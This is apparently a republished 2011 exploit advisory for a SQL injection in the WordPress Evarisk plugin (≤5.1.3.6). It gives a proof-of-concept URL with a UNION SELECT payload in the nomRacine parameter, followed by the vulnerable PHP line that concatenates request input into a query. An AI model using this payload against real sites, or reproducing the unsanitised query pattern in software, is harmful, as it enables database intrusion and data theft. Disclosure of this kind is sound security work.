Lucene search
K

WordPress Evarisk 5.1.3.6 SQL Injection

🗓️ 28 Aug 2011 00:00:00Reported by Miroslav StamparType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

WordPress Evarisk 5.1.3.6 SQL Injection Vulnerability in reloadComb

Code
`# Exploit Title: WordPress Evarisk plugin <= 5.1.3.6 SQL Injection Vulnerability  
# Date: 2011-08-28  
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)  
# Software Link: http://downloads.wordpress.org/plugin/evarisk.5.1.3.6.zip  
# Version: 5.1.3.6 (tested)  
# Note: magic_quotes has to be turned off  
  
---  
PoC  
---  
http://www.site.com/wp-content/plugins/evarisk/include/ajax.php?post=true&act=reloadCombo&table=wp_eva__veille_groupe_question&nomRacine=-1" UNION ALL SELECT 1,@@version,3,4,5,6,7--%20  
  
---------------  
Vulnerable code  
---------------  
if($_REQUEST['post'] == 'true')  
{  
if(isset($_REQUEST['act']))  
{  
switch($_REQUEST['act'])  
{  
...  
case 'reloadCombo':  
$racine = $wpdb->get_row( 'SELECT * FROM ' . TABLE_GROUPE_QUESTION . ' where nom="' . $_REQUEST['nomRacine'] . '"');  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Aug 2011 00:00Current
0.5Low risk
Vulners AI Score0.5
18